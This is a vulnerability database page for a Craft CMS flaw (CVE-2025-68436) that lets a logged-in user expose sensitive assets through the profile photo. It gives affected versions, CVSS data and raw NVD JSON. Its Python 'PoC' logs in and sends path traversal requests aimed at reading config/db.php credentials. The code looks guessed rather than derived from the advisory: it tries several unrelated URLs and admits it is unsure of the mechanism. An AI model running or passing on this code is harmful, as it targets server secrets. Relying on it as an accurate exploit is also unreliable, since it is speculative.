Security Vulnerability Report
中文
CVE-2025-68436 CVSS 6.5 MEDIUM

CVE-2025-68436

Published: 2026-01-05 22:15:52
Last Modified: 2026-01-12 18:29:18
Source: [email protected]

Description

Craft is a platform for creating digital experiences. In versions 5.0.0-RC1 through 5.8.20 and 4.0.0-RC1 through 4.16.16, authenticated users on a Craft installation could potentially expose sensitive assets via their user profile photo via maliciously crafted requests. Users should update to the patched versions (5.8.21 and 4.16.17) to mitigate the issue.

CVSS Details

CVSS Score
6.5
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N

Configurations (Affected Products)

cpe:2.3:a:craftcms:craft_cms:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:craftcms:craft_cms:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:craftcms:craft_cms:4.0.0:-:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:craftcms:craft_cms:4.0.0:rc1:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:craftcms:craft_cms:4.0.0:rc2:*:*:*:*:*:* - VULNERABLE
Craft CMS 5.0.0-RC1 至 5.8.20
Craft CMS 4.0.0-RC1 至 4.16.16

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests import re # CVE-2025-68436 PoC - Craft CMS Profile Photo Asset Exposure # Target: Craft CMS versions 5.0.0-RC1 to 5.8.20, 4.0.0-RC1 to 4.16.16 TARGET_URL = "http://target-craft-cms.com" USERNAME = "attacker_account" PASSWORD = "attacker_password" def exploit_cve_2025_68436(): """ Exploit for Craft CMS user profile photo sensitive asset exposure vulnerability. This PoC demonstrates how an authenticated low-privilege user can access sensitive assets through the profile photo functionality. """ session = requests.Session() # Step 1: Authenticate with low-privilege account login_url = f"{TARGET_URL}/admin/login" login_data = { 'loginName': USERNAME, 'password': PASSWORD } resp = session.post(login_url, data=login_data) if 'admin' not in resp.url: print("[-] Login failed") return None print("[+] Login successful") # Step 2: Get user ID and profile endpoint profile_url = f"{TARGET_URL}/admin/my-account" profile_page = session.get(profile_url) user_id = re.search(r'data-user-id="(\d+)"', profile_page.text) if not user_id: print("[-] Could not extract user ID") return None user_id = user_id.group(1) print(f"[+] User ID: {user_id}") # Step 3: Exploit profile photo endpoint to access sensitive assets # The vulnerability allows path traversal or parameter manipulation exploit_urls = [ f"{TARGET_URL}/actions/users/user-photo?userId={user_id}&filename=../../../../config/db.php", f"{TARGET_URL}/actions/users/user-photo?userId={user_id}&size=original", f"{TARGET_URL}/cpresources/../../../config/db.php" ] for url in exploit_urls: print(f"[*] Testing: {url}") resp = session.get(url, timeout=10) # Check for sensitive data exposure if resp.status_code == 200: content = resp.text if 'password' in content.lower() or 'database' in content.lower() or 'secret' in content.lower(): print(f"[!] SENSITIVE DATA EXPOSED via {url}") print(f"[+] Content preview: {content[:500]}") return content print("[-] Exploitation failed - no sensitive data retrieved") return None if __name__ == "__main__": exploit_cve_2025_68436()

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-68436", "sourceIdentifier": "[email protected]", "published": "2026-01-05T22:15:52.117", "lastModified": "2026-01-12T18:29:17.930", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Craft is a platform for creating digital experiences. In versions 5.0.0-RC1 through 5.8.20 and 4.0.0-RC1 through 4.16.16, authenticated users on a Craft installation could potentially expose sensitive assets via their user profile photo via maliciously crafted requests. Users should update to the patched versions (5.8.21 and 4.16.17) to mitigate the issue."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N/E:U/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 4.9, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "UNREPORTED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-200"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:craftcms:craft_cms:*:*:*:*:*:*:*:*", "versionStartIncluding": "4.0.0.1", "versionEndExcluding": "4.16.17", "matchCriteriaId": "5775BAC6-95FD-41E2-85CD-06A82F00B972"}, {"vulnerable": true, "criteria": "cpe:2.3:a:craftcms:craft_cms:*:*:*:*:*:*:*:*", "versionStartIncluding": "5.0.1", "versionEndExcluding": "5.8.21", "matchCriteriaId": "DD1EB061-284A-4708-BC67-DE02EF7A5E79"}, {"vulnerable": true, "criteria": "cpe:2.3:a:craftcms:craft_cms:4.0.0:-:*:*:*:*:*:*", "matchCriteriaId": "610F6DE9-720F-45B3-81D5-18E7F6B090FD"}, {"vulnerable": true, "criteria": "cpe:2.3:a:craftcms:craft_cms:4.0.0:rc1:*:*:*:*:*:*", "matchCriteriaId": "CC2F40FC-7C27-456A-B16D-679410D1D5CF"}, {"vulnerable": true, "criteria": "cpe:2.3:a:craftcms:craft_cms:4.0.0:rc2:*:*:*:*:*:*", "matchCriteriaId": "FBAA8227-04F8-404C-907B-B0162B325F5A"}, {"vulnerable": true, "criteria": "cpe:2.3:a:craftcms:craft_cms:4.0.0:rc3:*:*:*:*:*:*", "matchCriteriaId": "21B28E2C-327A-4CE6-ACAD-97E459712A55"}, {"vulnerable": true, "criteria": "cpe:2.3:a:craftcms:craft_cms:5.0.0:-:*:*:*:*:*:*", "matchCriteriaId": "1C7461CF-35AB-48E1-88B6-956DAE1D2AB4"}, {"vulnerable": true, "criteria": "cpe:2.3:a:craftcms:craft_cms:5.0.0:rc1:*:*:*:*:*:*", "matchCriteriaId": "8D8E02D1-601A-4E2B-B619-4775BFDB72D0"}]}]}], "references": [{"url": "https://github.com/craftcms/cms/commit/4bcb0db554e273b66ce3b75263a13414c2368fc9", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/craftcms/cms/security/advisories/GHSA-53vf-c43h-j2x9", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.